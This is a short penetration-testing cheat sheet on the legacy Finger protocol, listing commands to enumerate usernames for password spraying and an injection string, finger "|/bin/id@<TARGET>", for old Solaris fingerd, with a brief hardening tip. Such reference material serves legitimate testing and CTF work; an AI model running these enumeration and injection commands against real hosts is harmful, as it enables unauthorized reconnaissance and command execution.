Finger
Legacy user-information protocol on 79. Leaks valid usernames, who's logged in, and home/shell details — a quick way to build a user list for spraying, and some daemons allow command injection.
Ports
| Port | Proto | Notes |
|---|---|---|
79 | tcp | finger |
Fingerprint
- nmap finger script returns user info
- Raw `finger @host` lists logged-in users
Exploitation primitives
- Enumerate valid users (feeds password spraying) with finger-user-enum
- Query a specific user for home dir / shell / last login
- Some Solaris fingerd builds allow command injection via `finger 'user; cmd'@host`
Overview
Finger on 79 answers “who is this user / who’s online”. It’s almost never seen in the wild now, but on CTF/older boxes it’s a free username list.
Enumeration
List logged-in users:
finger @<TARGET>Query a specific user:
finger root@<TARGET>nmap script:
nmap -p79 --script finger <TARGET>Brute-force valid usernames into a list:
finger-user-enum.pl -U /usr/share/seclists/Usernames/names.txt -t <TARGET>Command injection (old Solaris fingerd)
finger "|/bin/id@<TARGET>"Hardening
Disable fingerd entirely — there’s no modern reason to run it.